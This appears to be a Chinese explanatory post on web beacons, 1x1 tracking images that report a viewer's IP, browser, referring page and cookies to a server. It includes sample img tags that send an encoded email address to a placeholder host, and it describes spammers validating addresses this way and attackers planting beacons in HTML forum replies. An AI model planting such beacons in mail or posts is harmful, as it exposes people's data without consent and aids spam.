网络臭虫又叫 网络信标(Web beacon),
是可以暗藏在任何网页元素或邮件内的1像素大小的透明GIF或PNG图片
可以理解为<img src="http://www.webbeancon.php?附加信息 height="1" width="1"/>
网络臭虫的目的是把用户的信息上传到服务端
邮件跟踪和垃圾邮件
垃圾邮件的发送者,随机生成邮件的接受者的地址,并在邮件中埋入一个网络臭虫,网络臭虫可以是一个一像素的图片比如:
<img src="http://www.webbeacon.php?编码后的邮件接收入地址" height="1" width="1"/>
这样当有真实用户打开邮件时,会装载图片,但实际是调用这个请求到服务器端(因为像素小,看不到界面)。这样服务器端就可以根据参数部分确定这个收件人是有效的邮件,而记录这个收件人,后续就可以专门针对他发送垃圾邮件了。
这
里之所以用<img>是应为网站只要装入网页就会从服务器中获取图片信息,使用这种机制的一个抓住的漏洞是,有些论坛可以发送带html格式
的内容作为跟帖,这样恶意者可以发送的跟帖子中植入一个网络臭虫,这样第三方浏览人员打开帖子并查看跟帖时将会激发网络臭虫的调用,而把浏览器的信息等一
些数据传送到网络臭虫所指定的网址上去。
网络臭虫可以收集到的信息如下(HTTP请求头中的信息):
1。第三方浏览者的IP地址,
2。第三方浏览者的浏览器类型
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
3。网络臭虫所在网页的网址,也就是当前浏览的页面
Referer: http://www.baidu.com/
4.网络臭虫被访问的时间,服务器算出
5.臭虫服务器原来保存在本地的cookie信息,在请求时会根据臭虫网址的url地址获取保存在本地的cookie信息。
6.在臭虫网址响应时还可以写入cookie到本地,这个cookie信息可以根据请求的信息来生成唯一一个标识客户端的数据,这样下次客户端再次通过别的网址访问臭虫网址时(当然另外一个网站也是植入了这个臭虫网址的)就可以上传以前访问过的信息的。
以百度广告联盟为例子,
当你在百度中搜索信息时,百度会记录你的搜索信息,同时会在你本地保存一个标识本地的cookie,
而当你打开第三方网站时,第三方网站嵌入了百度广告的JS代码,里面有请求百度广告的请求,而发这个请求时会把原来保存在本地的cookie上传给百度,而百度在服务器根据你的机器标识和你曾经的搜索来推送不同的广告给你。
web beacon